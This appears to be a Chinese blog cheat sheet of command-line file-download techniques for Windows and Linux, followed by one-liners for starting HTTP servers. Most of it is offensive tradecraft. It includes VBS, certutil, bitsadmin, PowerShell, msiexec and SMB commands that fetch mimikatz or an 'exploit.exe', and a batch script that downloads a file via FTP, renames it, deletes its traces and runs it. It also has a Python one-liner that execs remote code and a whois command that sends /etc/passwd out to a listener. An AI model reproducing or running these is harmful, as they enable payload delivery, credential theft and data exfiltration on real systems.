windows/linux命令行环境下几种文件下载的方法与httpserver的生成_http-server linux离线下载

windows

Vbs

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","https://raw.githubusercontent.com/shanfenglan/mimikatz/master/mimikatz.sln",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vb
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:\2.exe",2 >>download.vbs
1
2
3
4
5
6
7
8
9
10

vbs脚本执行命令：
wscript download.vbs

---

certutil

certutil.exe -urlcache -split -f http://ip/test/1.exe c:/1.exe

---

bitsadmin

bitsadmin /rawreturn /transfer getfile https://raw.githubusercontent.com/shanfenglan/mimikatz/master/mimikatz.sln C:\323.txt

bitsadmin /rawreturn /transfer down "http://127.0.0.1:8080/ms10-051.exe" c:\\exploit.exe
1

---

powershell

powershell (Invoke-WebRequest -Uri "https://github.com/HoldOnToYourHeart/nc/raw/cafb11118be48803396d472ca85c3e7c099b4891/calc.exe" -OutFile "C:\Users\31030\Desktop\tools\test\calc2.exe")

powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"

1
2
3
4

powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe','C:\Users\31030\Desktop\tools\test\calc.exe')
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms10-051.exe', exploit.exe)"

1
2
3

---

FTP

echo open 192.168.124.136>>1.txt
echo user administrator 1234>>1.txt
echo get 1.exe>>1.txt
echo bye>>1.txt
echo exit>>1.txt
1
2
3
4
5

ftp -i -n -s:"1.txt"

BAT通过FTP下载并执行程序

@echo off
echo open %1%>>ftptmp.bat
echo user %2%>>ftptmp.bat
echo %3%>>ftptmp.bat
echo cd %4%>>ftptmp.bat
echo get %5%>>ftptmp.bat
echo bye>>ftptmp.bat
ftp -i -n -s:ftptmp.bat
rename %5% svcmorne.exe
del *.bat
svcmorne.exe
exit
1
2
3
4
5
6
7
8
9
10
11
12

main.bat 192.168.124.136 administrator 1234 c:/ 1.exe

内网中用ips$下载

copy \127.0.0.1\c$\ms10-051.exe C:\exploit.exe
1

---

用python下载

python -c "import urllib2; exec urllib2.urlopen('http://127.0.0.1:8080/ms10-051.exe').read();"
1

---

用msiexec下载

msiexec /q /i http://127.0.0.1:8080/ms10-051.exe
1

---

使用smb

copy \\127.0.0.1\files\ms10-051.exe exploit.exe
1

linux

SCP命令

scp是安全的文件拷贝，基于ssh的登录

假定你想把本地计算机/home下的一个名为a.tar.tz的文件拷贝到远程服务器192.168.0.2上的/home/tmp。而且你在远程服务器 上的帐号名为root。可以用这个命令：
scp /home/a.tar.tz root@192.168.0.2:/home/tmp/

如果把文件从远程机器拷贝到本机当前目录用这个命令：
scp root@192.168.0.2: /home/a.tar.tz

拷贝远程机器的整个目录下的文件
scp -r root@192.168.0.2:/home/* ./

拷贝远程机器的整个目录到本机的指定文件夹内
scp -r root@120.55.194.145:/root/123 C:\Users\Admin\Desktop\csdn_increase_vister-master

---

用python下载

python -c "import urllib2; exec urllib2.urlopen('http://127.0.0.1:8080/ms10-051.exe').read();"
1

---

使用whois命令传送数据

whois -h 127.0.0.1 -p 8080 `cat /etc/passwd | base64`
nc -lvvp 8080 | sed "s/ //g" | base64 -d
1
2

---

使用curl

curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe
1

使用wget

wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe
1

补充：开启http server的方法

python

python3  -m http.server
python -m SimpleHTTPServer 
1
2

php

php -S 0.0.0.0:8080
1

ruby

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8080, :DocumentRoot => Dir.pwd).start'
1

ruby -run -e httpd . -p 8080
1

busybox

busybox httpd -f -p 8080
1